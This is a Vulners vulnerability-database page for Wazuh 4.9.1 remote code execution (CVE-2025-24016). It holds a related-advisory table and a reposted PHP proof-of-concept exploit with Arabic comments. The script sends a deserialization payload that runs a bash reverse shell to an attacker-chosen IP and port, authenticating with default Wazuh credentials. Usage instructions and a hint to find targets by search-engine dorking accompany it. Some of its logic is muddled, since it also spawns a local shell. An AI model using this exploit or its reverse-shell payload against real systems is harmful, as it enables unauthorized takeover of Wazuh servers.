Vulners
Lucene search
Wazuh 4.9.1 Remote Code Execution
| Reporter | Title | Published | Views | Family All 47 |
|---|---|---|---|---|
 | Exploit for Deserialization of Untrusted Data in Wazuh | 13 Feb 202506:38 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 13 Jul 202523:56 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 10 Jun 202518:54 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 16 Feb 202511:01 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 10 Jun 202521:07 | – | githubexploit |
 | CVE-2025-24016 | 10 Feb 202500:00 | – | attackerkb |
 | CVE-2025-24016 | 10 Feb 202517:01 | – | circl |
 | Wazuh Server Deserialization of Untrusted Data Vulnerability | 10 Jun 202500:00 | – | cisa_kev |
 | CISA Adds Two Known Exploited Vulnerabilities to Catalog | 10 Jun 202512:00 | – | cisa |
 | Wazuh 代码问题漏洞 | 10 Feb 202500:00 | – | cnnvd |
10
=============================================================================================================================================
| # Title : Wazuh v 4.9.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wazuh.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description:
This PHP script is used to exploit the Remote Code Execution (RCE) vulnerability in the Wazuh server.
It sends a request to the target server with a special payload that allows a reverse shell to be opened on the local server.
[+] save code as poc.php .
[+] USage : php poc.php -u https://<worker-server>:55000/security/user/authenticate/run_as -i 192.168.1.10 -p 4444
[+] PayLoad :
<?php
// تفعيل التسجيل بالخطأ
ini_set('log_errors', 1);
ini_set('error_log', 'php_errors.log');
date_default_timezone_set('UTC');
// تعريف دالة للطباعة الملونة
function color_print($text, $color = null) {
switch ($color) {
case 'error':
return "\033[1;31m$text\033[0m"; // اللون الأحمر
case 'warning':
return "\033[1;33m$text\033[0m"; // اللون الأصفر
case 'success':
return "\033[1;32m$text\033[0m"; // اللون الأخضر
case 'info':
return "\033[1;36m$text\033[0m"; // اللون الأزرق
default:
return $text;
}
}
// التحقق من الإصدار
function version_check() {
try {
$req_version = phpversion(); // إصدار PHP
$pyfiglet_version = '2.5.0'; // الافتراضى (بإمكانك التعديل حسب النسخة)
echo "الإصدارات الحالية:\n";
echo "PHP: $req_version\n";
echo "PyFiglet: $pyfiglet_version\n";
} catch (Exception $e) {
echo "فشل التحقق من الإصدار: " . $e->getMessage() . "\n";
}
}
// التحقق من صحة الـ IP
function check_ip($ip) {
if (filter_var($ip, FILTER_VALIDATE_IP)) {
return true;
} else {
echo color_print("IP غير صالح: $ip", 'error') . "\n";
return false;
}
}
// التحقق من صحة الـ Port
function check_port($port) {
if (is_numeric($port) && $port > 0 && $port <= 65535) {
return true;
} else {
echo color_print("Port غير صالح: $port", 'error') . "\n";
return false;
}
}
// التحقق من صحة الـ URL
function check_url($url) {
if (filter_var($url, FILTER_VALIDATE_URL)) {
return true;
} else {
echo color_print("URL غير صالح. تأكد من أنه يبدأ بـ http:// أو https://", 'error') . "\n";
return false;
}
}
// دالة لتحليل الوسائط من سطر الأوامر
function parse_args() {
global $argv;
$args = getopt('u:i:p:user::pass::c::n::');
return $args;
}
function main() {
$args = parse_args();
// التحقق من صحة المدخلات
if (!isset($args['u']) || !isset($args['i']) || !isset($args['p'])) {
echo color_print("يجب تحديد URL و IP و Port!", 'error') . "\n";
exit(1);
}
if (!check_ip($args['i']) || !check_port($args['p']) || !check_url($args['u'])) {
exit(1);
}
version_check();
echo "Wazuh RCE - CVE-2025-24016\n";
echo "لأغراض البحث والاختبار فقط!\n";
echo "الاستخدام غير المصرح به محظور.\n";
echo "بواسطة: Jessie\n";
echo "الائتمان: Aiman، Cahyo، Ihsan و Arch \n";
// إعداد الحمولة
$payload = [
"__unhandled_exc__" => [
"__class__" => "os.system",
"__args__" => [
"bash -i >& /dev/tcp/{$args['i']}/{$args['p']} 0>&1"
]
]
];
$headers = [
"Content-Type: application/json",
"X-Header-Name: Custom-Header"
];
// بيانات المصادقة
$username = $args['user'] ?? 'wazuh-wui';
$password = $args['pass'] ?? 'MyS3cr37P450r.*-';
// إرسال طلب POST
$url = $args['u'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_USERPWD, "$username:$password");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$response = curl_exec($ch);
$status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($status_code != 200) {
echo color_print("رمز حالة الاستجابة: $status_code", 'error') . "\n";
if (strpos($response, 'Unauthorized') !== false) {
echo color_print("فشل المصادقة", 'error') . "\n";
} else {
echo color_print("استجابة غير طبيعية: $response", 'error') . "\n";
}
exit(1);
}
echo color_print("تمت المصادقة بنجاح!", 'success') . "\n";
echo "الاستجابة: " . color_print($response, 'info') . "\n";
// إجراء شل عكسي
echo color_print("تم إنشاء الاتصال بالشل العكسي إلى {$args['i']}:{$args['p']}", 'info') . "\n";
sleep(5); // محاكاة الاتصال
$command = "bash -i";
$reverse_shell = shell_exec($command);
if ($reverse_shell === null) {
echo color_print("فشل الشل العكسي", 'error') . "\n";
} else {
echo color_print("تم الاتصال بالشل العكسي بنجاح!", 'success') . "\n";
}
}
main();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Mar 2025 00:00Current
8.3High risk
Vulners AI Score8.3
CVSS 3.19.9
EPSS0.93512
SSVC